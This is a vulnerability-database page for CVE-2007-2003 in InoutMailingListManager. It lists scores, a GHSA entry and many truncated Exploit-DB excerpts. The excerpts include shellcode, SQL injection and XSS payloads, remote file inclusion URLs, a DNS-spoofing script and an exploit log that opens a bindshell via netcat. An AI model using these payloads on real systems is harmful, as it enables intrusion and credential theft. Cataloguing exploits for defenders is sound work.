CVE-2007-2003
published 2007-04-12CVE-2007-2003: InoutMailingListManager 3.1 and earlier sends a Location redirect header but does not exit after an authorization check fails, which allows remote attackers to…
PriorityP337medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.01%
78.4th percentile
InoutMailingListManager 3.1 and earlier sends a Location redirect header but does not exit after an authorization check fails, which allows remote attackers to access certain restricted functionality, and upload and execute arbitrary PHP code, by ignoring the redirect.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| inoutmailinglistmanager | inoutmailinglistmanager | <= 3.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3fwh-xpjw-6p29: InoutMailingListManager 3
ghsa_unreviewed·2022-05-01
CVE-2007-2003 [MEDIUM] GHSA-3fwh-xpjw-6p29: InoutMailingListManager 3
InoutMailingListManager 3.1 and earlier sends a Location redirect header but does not exit after an authorization check fails, which allows remote attackers to access certain restricted functionality, and upload and execute arbitrary PHP code, by ignoring the redirect.
Citrix
CVE-2007-0108: nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows
vendor_citrix·2007-01-09·CVSS 6.0
CVE-2007-0108 [MEDIUM] CVE-2007-0108: nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows
CVE-2007-0108: nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows remote authenticated users to invoke alternate user profiles.
No detection rules found.
Exploit-DB
GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
exploitdb·2020-03-03
GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
---
# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007"
# Date: 2020-03-02
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -
Older versions are also vulnerable.
Source code:
http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
Setup instructions:
http://download.openeclass.org/files/docs/1.7/Install.pdf
Changelog:
https://download.openeclass.org/files/docs/1.7/CHANGES.txt
Manual:
h
Exploit-DB
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
exploitdb·2020-02-24
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
---
# Exploit Title: GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007"
# Date: 2019-11-03
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -
# GUnet OpenEclass Copy to file -> Save as eclasstestlogin)
4) Load the file to SQLMap with the use of -r parameter
sqlmap -r eclasstestlogin --level=5 --risk=3 -v
SQLMap will find the following payload
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=te
Exploit-DB
Microsoft Exchange 2003 - base64-MIME Remote Code Execution
exploitdb·2019-07-05
CVE-2007-0213 Microsoft Exchange 2003 - base64-MIME Remote Code Execution
Microsoft Exchange 2003 - base64-MIME Remote Code Execution
---
# Python 2.7 (included with ImmunityDBG)
# Exchange 2003 SP0 base64-MIME memory corruption
# NSA's `ENGLISHMANSDENTIST`
# Platform: Windows Server 2003 R2
# Shout out to the Equation Group, NSA Tailored Access Operations
# Author: Charles Truscott @r0ss1n1
# Shout out to Offensive Security, from Australia with Love
import time
import socket
import base64
import struct
#payload ="eJ8+InlpAQaQCAAEAAAAAAABAAEAAgKQBgAOAAAAAAAAAAAAAAAAAAAAAAAAAAIFkAYAevwAAAEA" + "\r\n"
#payload+="AAANAAE3AQAAAGr8AAALAAAAAAAAAMAAAAAAAABG0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgAD" + "\r\n"
#payload+="AP7/CQAGAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAEAAA/v///wAAAAD+////AAAAAAAAAAD/////" + "\r\n"
#payload+="//////////////////////////////////////////////////////
Exploit-DB
Microsoft Word 2007 (x86) - Information Disclosure
exploitdb·2017-09-30
Microsoft Word 2007 (x86) - Information Disclosure
Microsoft Word 2007 (x86) - Information Disclosure
---
Title: MS Office Word Information Disclosure Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007 32-bits (x86)
Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP (X86 and x64)
CVE: N/A
Description:
MS Office Word contains an Internet Explorer (IE) Script execution issue through a currently well known vector:
The "Microsoft Scriptlet Component" ActiveX.
Originally found by info sec. researcher Juan Pablo Lopez Yacubian and made public on May, 2008, this issue
allowed web pages to be displayed, inline, in Office documents, rendered by the MS IE rendering engine.
This issue facilitates attacks against the
Exploit-DB
Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution
exploitdb·2017-09-28
Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution
Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution
---
Title: MS Office Groove 'Workspace Shortcut' Arbitrary Code Execution Vulnerability
Date: September 28th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007 32-bits (x86)
Tested on: Windows 7/Server 2008/Vista/Server 2003/XP (X86 and x64)
CVE: N/A
Description:
MS Office Groove contains a security bypass issue regarding 'Workspace Shortcut' files (.GLK)
because it allows arbitrary (registered) URL Protocols to be passed, when only 'grooveTelespace://' URLs
should be allowed, which allows execution of arbitrary code upon opening a 'GLK' file.
Usually, URLs are passed to web browsers, but because it uses 'ShellExecute()', i
Exploit-DB
Microsoft Excel 2007/2010/2013 - BIFFRecord Use-After-Free
exploitdb·2015-09-16
CVE-2015-2523 Microsoft Excel 2007/2010/2013 - BIFFRecord Use-After-Free
Microsoft Excel 2007/2010/2013 - BIFFRecord Use-After-Free
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=462
The following crash was observed in Microsoft Excel 2007 running on Windows 2003 R2. This crash was also reproduced in Microsoft Excel 2010 on Windows 7 x86 and Microsoft Excel 2013 on Windows 8.1 x86. The test environment was Excel 2007 on Windows 2003 R2 with application verifier basic checks enabled.
Attached files:
Original File: 683709058_orig.xls
Crashing File: 683709058_crash.xls
Minimized Crashing File: 683709058_min.xls
The minimized crashing file shows two deltas from the original. The first at offset 0x237 is in the data of the 4th BIFFRecord and the second delta at offset 0x34a5 is in the type field of a BIFFRecord.
File versions:
Exploit-DB
Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)
exploitdb·2015-08-21
CVE-2015-2467 Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)
Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=414&can=1
The following crash was observed in MS Office 2007 running under Windows 2003 x86. Microsoft Office File Validation Add-In is disabled and application verified was enabled for testing and reproduction. This sample did not reproduce in Office 2010 running on Windows 7 x86.
The attached minimized PoC that produces the crash with 2 bit changes from the original file at offsets 0x11E60 and 0x1515F. Standard office document parsers did not reveal any significance about this location.
Attached files:
Fuzzed minimized PoC: 1567070353_min.doc
Fuzzed non-minimized PoC: 1567070353_crash.doc
Original non-fuzzed file: 1567070353_orig.doc
DLL Versi
Exploit-DB
Microsoft Word - Local Machine Zone Code Execution (MS15-022)
exploitdb·2015-07-20·CVSS 9.3
CVE-2015-0097 [CRITICAL] Microsoft Word - Local Machine Zone Code Execution (MS15-022)
Microsoft Word - Local Machine Zone Code Execution (MS15-022)
---
Exploit Title: Microsoft Word Local Machine Zone Remote Code Execution Vulnerability
Date: July 15th, 2015
Exploit Author: Eduardo Braun Prado
Vendor Homepage : http://www.microsoft.com
Version: 2007
Tested on: Microsoft Windows XP, 2003, Vista, 2008, 7, 8, 8.1
CVE: CVE-2015-0097
Original Advisory: https://technet.microsoft.com/library/security/ms15-022
Microsoft Word, Excel and Powerpoint 2007 contains a remote code execution vulnerability because it is possible
to reference documents such as Works document (.wps) as HTML. It will process HTML and script code in the context
of the local machine zone of Internet Explorer which leads to arbitrary code execution.
By persuading users into opening eg. specially crafted .WPS,
Exploit-DB
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
exploitdb·2014-09-29
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
---
# Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability
# Google Dork: NA
# Date: 08/01/2014
# Exploit Author: Nate Power
# Vendor Homepage: microsoft.com
# Software Link: NA
# Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# Tested on: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# CVE : NA
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure',
'Description' => %q{
This module tests vulnerable IIS HTTP header file paths on Microsoft Exchange OWA 2003, CAS 2007, 2010, 201
Exploit-DB
Oracle HTTP Server - Cross-Site Scripting Header Injection
exploitdb·2011-06-13·CVSS 4.3
CVE-2006-3918 [MEDIUM] Oracle HTTP Server - Cross-Site Scripting Header Injection
Oracle HTTP Server - Cross-Site Scripting Header Injection
---
Oracle HTTP Server XSS Header Injection
# Attack Pattern ID : CAPEC-86
# CWE ID : CI-79
# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)
# CVE ID : not yet
# Related CVEs : CVE-2006-3918, CVE-2007-0275
# A.K.A : Unfiltered Header Injection
# Product Type : Application
# Vendor : Oracle Corporation
# Product : Oracle HTTP Server for Oracle Application Server 10g
# Vulnerable Versions: 10.1.2.0.2
# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0
# Severity : Medium
# Tested on : Linux, Windows Server 2003
# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html
# Date : 12/06/2011
# Google Dork : allintitle:"Oracle HTTP Server -"
[-] Cre
Exploit-DB
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
exploitdb·2011-03-04
CVE-2010-3333 Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
---
##
# $Id: ms10_087_rtf_pfragments_bof.rb 11875 2011-03-04 08:39:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087
Exploit-DB
Microsoft Excel - FEATHEADER Record (MS09-067)
exploitdb·2010-08-21·CVSS 7.8
CVE-2009-3129 [HIGH] Microsoft Excel - FEATHEADER Record (MS09-067)
Microsoft Excel - FEATHEADER Record (MS09-067)
---
#MS Excel Malformed FEATHEADER Record Exploit
#CVE-2009-3129, MS09-067, OSVDB-59860
#Vulnerble application MS office 2003/2007
#Tested on XP SP2 - MS Ofice 2003 v. 11.5604.5606
#Sean Larsson - Original Discovery
#!/usr/bin/python
import sys
import zlib
#Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes by RubberDuck =)
shellcode = (
b"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
b"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
b"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
b"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
b"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
b"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
b"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
b"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
b"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
b"\x
Exploit-DB
CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
exploitdb·2010-08-14·CVSS 10.0
CVE-2007-3336 [CRITICAL] CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
---
# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
# Date: 2010-08-14
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3336 - CVE-2007-3338
# Notes: Fixed in the last version.
# iigcc - EDX holds a pointer that's overwritten at byte 2106 and it crashes while executing
# MOV EAX,DWORD PTR DS:[EDX+8]
# iijdbc - EDI holds a pointer that's overwritten at byte 1066 and it crashes while executing
# CMP ECX,DWORD PTR DS:[EDI+4]
# please let me know if you are/were able to get code execution
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py "
print "Vulnerable Serv
Exploit-DB
IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2008-03-19
CVE-2007-4592 IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities
IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/28296/info
IBM Rational ClearQuest is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input.
An attacker could exploit these vulnerabilities to execute arbitrary local or remote script code in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Ration ClearQuest 2003.06.16, 7.0.0.1, 7.0.0.2, 7.0.1.0, and 7.0.1.1 are vulnerable; other versions may also be affected.
http://www.example.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('
Exploit-DB
project alumni 1.0.9 - Cross-Site Scripting / SQL Injection
exploitdb·2007-11-24
CVE-2007-6127 project alumni 1.0.9 - Cross-Site Scripting / SQL Injection
project alumni 1.0.9 - Cross-Site Scripting / SQL Injection
---
project-alumni sql injection & xss
author : tomplixsee
[email protected]
affected software version : project alumni v1.0.9, v1.0.8, or lower??
download : https://sourceforge.net/projects/project-alumni/
vulnerability
1.sql injection
++++++++++++++++
condition: magic_quotes_gpc = off
vulnerable code on view.page.inc.php:
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'");
reason: bad filtering
exploit:
http://victim/path/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1
result example:
+--------------------------------------------------------------------------
Exploit-DB
Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow
exploitdb·2007-11-16
CVE-2007-6026 Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow
Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow
---
Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability
by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net
Summary:
A remote code execute vulnerability exists in Microsoft Jet
Engine. A remote attacker who successfully exploit this vulnerability
can execute arbitrary code on the affected system.
Affected Software Versions:
Microsoft Office Access 2003 sp3 on Windows XP SP2(chinese)
(Other versions may also be affected)
How to Reproduce:
Open the attached file
"Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb" with Office Access
2003 sp3 on Windows XP SP2, then "calc.exe" will be executed, please
do not use the exploit for attacking.
The attached file is at:
http://ruder.cdut.net/attach/MS_MDB_
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
exploitdb·2007-11-13
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
$TRXID=$ARGV[0];
$zero=$TRXID>>14;
if ($zero!=0)
{
print "Highest two bits are not 0.\n";
print "Is this really Windows DNS server? check endian issues!\n";
exit(0);
}
$M=($TRXID>>11) & 7;
$C=($TRXID>>3) & 0xFF;
$L=$TRXID & 7;
if (($C % 8)!=7)
{
print "C mod 8 is not 7 - can't predict next TRXID.\n";
print "Wait for C mod 8 to become 7\n";
exit(0);
}
print "Next TRXID is one of the following 8 values:\n";
for ($m=0;$m<8;$
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
exploitdb·2007-11-13
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
#!/usr/bin/perl
use strict;
use Net::DNS;
use Net::DNS::Nameserver;
use IO::Socket;
use Net::RawIP;
sub usage {
print ("$0 is a program for DNS id spoofing.\n");
print ("usage: $0 target tospoof ourzone port\n");
print ("Example: $0 ns1.belbone.be www.hotmail.com .cache-poisoning.net 1025\n");
}
my($target, $tospoof, $ourzone, $query_port) = @ARGV;
$tospoof = "www.hotmail.com" unless($tospoof);
$ourzone = ".cache-poiso
Exploit-DB
OpenBase 10.0.x - Remote Buffer Overflow / Remote Command Execution
exploitdb·2007-11-05
CVE-2007-5926 OpenBase 10.0.x - Remote Buffer Overflow / Remote Command Execution
OpenBase 10.0.x - Remote Buffer Overflow / Remote Command Execution
---
source: https://www.securityfocus.com/bid/26347/info
OpenBase is prone to a buffer-overflow vulnerability and multiple remote command-execution vulnerabilities.
An attacker could exploit these issues to execute arbitrary code or commands with superuser privileges. Successfully exploiting these issues will facilitate in the complete compromise of affected computers.
1. call AsciiBackup('\`id\`')
results in commands being run as root.
desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages
OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.
Using database 'WOMovies' on host 'localhost'
Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.
Exploit-DB
teatro 1.6 - 'basePath' Remote File Inclusion
exploitdb·2007-10-28
CVE-2007-5780 teatro 1.6 - 'basePath' Remote File Inclusion
teatro 1.6 - 'basePath' Remote File Inclusion
---
# teatro 1.6 Remote File Include Vulnerability
Download script : http://telemat.die.unifi.it/book/2003/Telematica-II/teatro-1.6.tgz
Dicovered by : Alkomandoz Hacker
Contact : [email protected]
http://localhost/path/teatro/pub/pub08_comments.php?basePath=shell.txt
# Thanx: AsbMay's Group & City Of Ghosts Team & Sniper-sa Team
# Greetz To: Sniper_Sa & Pal-Hackers & Hack eGy & Dr SeSo & No4Hard & Devil-x & Gold_M
# milw0rm.com [2007-10-28]
Exploit-DB
IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
exploitdb·2007-10-27
CVE-2007-4880 IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
---
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.
Exploit-DB
Macrovision SafeDisc - 'SecDRV.SYS' Method_Neither Privilege Escalation
exploitdb·2007-10-18
CVE-2007-5587 Macrovision SafeDisc - 'SecDRV.SYS' Method_Neither Privilege Escalation
Macrovision SafeDisc - 'SecDRV.SYS' Method_Neither Privilege Escalation
---
source: https://www.securityfocus.com/bid/26121/info
Macrovision SafeDisc is prone to a local privilege-escalation vulnerability because it fails to adequately sanitize user-supplied input.
Exploiting this vulnerability allows local attackers to execute arbitrary malicious code with SYSTEM-level privileges, facilitating the complete compromise of affected computers.
UPDATE: This issue affects only Microsoft Windows XP and 2003 platforms. Microsoft Vista is not affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30680.zip
Exploit-DB
Microsoft Windows - URI Handler Command Execution
exploitdb·2007-10-05
CVE-2007-3896 Microsoft Windows - URI Handler Command Execution
Microsoft Windows - URI Handler Command Execution
---
source: https://www.securityfocus.com/bid/25945/info
Microsoft Windows XP and Server 2003 with Internet Explorer 7 is prone to a command-execution vulnerability because it fails to properly sanitize input.
Successfully exploiting this issue allows remote attackers to execute arbitrary commands in the context of users that follow malicious URIs.
Known attack vectors include following URIs in these applications:
- Mozilla Firefox in versions prior to 2.0.0.6
- Skype in versions prior to 3.5.0.239
- Adobe Acrobat Reader 8.1
- Miranda 0.7
- Netscape 7.1
- mIRC.
NOTE: Attackers can exploit the issue in BID 25543 (Mozilla Firefox 2.0.0.6 Unspecified Protocol Handling Command Injection Vulnerability) as an attack vector for this issue.
Exploit-DB
Epic Games Unreal Engine Logging Function - Remote Denial of Service
exploitdb·2007-08-20
CVE-2007-4442 Epic Games Unreal Engine Logging Function - Remote Denial of Service
Epic Games Unreal Engine Logging Function - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/25374/info
The Unreal Engine is prone to a remote denial-of-service vulnerability because the application fails to properly bounds-check user-supplied input.
Successfully exploiting this issue allows remote attackers to corrupt application memory in a manner that causes a crash. Remote code execution may be possible, but this has not been confirmed.
Versions of Unreal Engine that are included in Unreal Tournament 2003 and 2004 are vulnerable. Given the reuse of the engine in multiple other products, other games and versions are also likely vulnerable.
This vulnerability also affects America's Army 2.8.2 when Punkbuster is enabled on the local server; other versions may a
Exploit-DB
IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
exploitdb·2007-07-26
CVE-2007-3927 IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
---
#!/use/bin/perl
# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
# Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org
#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
#* OK IMAP4 Server (IMail 9.10)
#0 OK LOGIN completed
#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
#* 0 EXISTS
#* 0 RECENT
#* OK [UIDVALIDITY 1185270594] UIDs valid
#* OK [UIDNEXT 485270595] Predicted next UID
#2 OK [READ-WRITE] SELECT completed
#3 OK SUBSCRIBE completed
#Trying..
#Bingle!Maybe get it!
#You can try to telnet 22 port, do you have nc?
#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22
#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
#(UNKNOWN) [192.168
Exploit-DB
WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
exploitdb·2007-07-10
CVE-2007-3681 WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
---
/*
WinPcap NPF.SYS Privilege Elevation Vulnerability PoC exploit
Affected software:
(*) WinPcap versions affected (Confirmed)
- WinPcap 4.0 and previous
(*) WinPcap fixed version (stable) : WinPcap 4.0.1
Note : There was an error in the previous advisory, which tells WinPcap
4.1 is affected, in fact WinPcap 4.1 is the beta version.
(*) Operating systems affected (Confirmed)
- Windows 2000 SP4 (Both server and workstation)
- Windows XP SP2
- Windows 2003 Server
- Windows Vista !!
Description:
It's a well known issue that WinPcap security model allows non-administrator
users to use its device driver. If they don't manually unload it after using
tools such as Wireshark (ethereal), which unfortunatelly oftenly happens, this
can
Exploit-DB
Microsoft Excel 2000/2003 - Sheet Name (PoC)
exploitdb·2007-06-27
CVE-2007-3490 Microsoft Excel 2000/2003 - Sheet Name (PoC)
Microsoft Excel 2000/2003 - Sheet Name (PoC)
---
Vuln Exposed by: ZhenHan.Liu
Team: Ph4nt0m Security Team
http://www.ph4nt0m.org
Tested on: Full Patched Excel 2003 Sp2, CN
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4121.zip (06272007-2670.zip)
# milw0rm.com [2007-06-27]
Exploit-DB
Ingress Database Server 2.6 - Multiple Remote Vulnerabilities
exploitdb·2007-06-21·CVSS 10.0
CVE-2007-3334 [CRITICAL] Ingress Database Server 2.6 - Multiple Remote Vulnerabilities
Ingress Database Server 2.6 - Multiple Remote Vulnerabilities
---
source: https://www.securityfocus.com/bid/24585/info
Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337
Exploit-DB
XOOPS Module horoscope 2.0 - Remote File Inclusion
exploitdb·2007-06-12
CVE-2007-3236 XOOPS Module horoscope 2.0 - Remote File Inclusion
XOOPS Module horoscope 2.0 - Remote File Inclusion
---
BeyazKurt - [email protected]
XOOPS Modules Horoscope
http://www.xoops.org/modules/repository/visit.php?cid=32&lid=1162
modules/horoscope/footer.php?xoopsConfig[root_path]=
{NetLife Since : '2003-4'}
Emekli Heykır BeyazKurt - Neti bıraktım! Dönüşüm mükemmel olcak ;(
# milw0rm.com [2007-06-12]
Exploit-DB
Berylium2 2003-08-18 - 'beryliumroot' Remote File Inclusion
exploitdb·2007-05-07
CVE-2007-2531 Berylium2 2003-08-18 - 'beryliumroot' Remote File Inclusion
Berylium2 2003-08-18 - 'beryliumroot' Remote File Inclusion
---
#Berylium2 Remote file inclusion
#Download script : http://berylium.org/source/be2-2003-08-18.tar.gz
#Thanks Str0ke
#Exploit :
#http://victim.com/[berylium2_path]/code/berylium-classes.php?beryliumroot=shell.txt?
#Discovered by : ThE TiGeR
#Miro_Tiger[at]hotmail[dot]com
#Greetz : â„¢~${{BraveHeart}}$~â„¢
# milw0rm.com [2007-05-07]
Exploit-DB
Microsoft Windows - DNS RPC Remote Buffer Overflow (2)
exploitdb·2007-04-18
CVE-2007-1748 Microsoft Windows - DNS RPC Remote Buffer Overflow (2)
Microsoft Windows - DNS RPC Remote Buffer Overflow (2)
---
Exploit v2 features:
- Target Remote port 445 (by default but requires auth)
- Manual target for dynamic tcp port (without auth)
- Automatic search for dynamic dns rpc port
- Local and remote OS fingerprinting (auto target)
- Windows 2000 server and Windows 2003 server (Spanish) supported by default
- Fixed bug with Windows 2003 Shellcode
- Universal local exploit for Win2k (automatic search for opcodes)
- Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
- Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
- Microsoft RPC api used ( who cares? :p )
D:\Programación\DNSTEST>dnstest
Microsoft Dns Server local & remote
Exploit-DB
InoutMailingListManager 3.1 - Remote Command Execution
exploitdb·2007-04-10
CVE-2007-2004 InoutMailingListManager 3.1 - Remote Command Execution
InoutMailingListManager 3.1 - Remote Command Execution
---
#!/usr/bin/php -q -d short_open_tag=on
Thanks to rgod for the php code and Marty for the Love
";
if ($argc
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
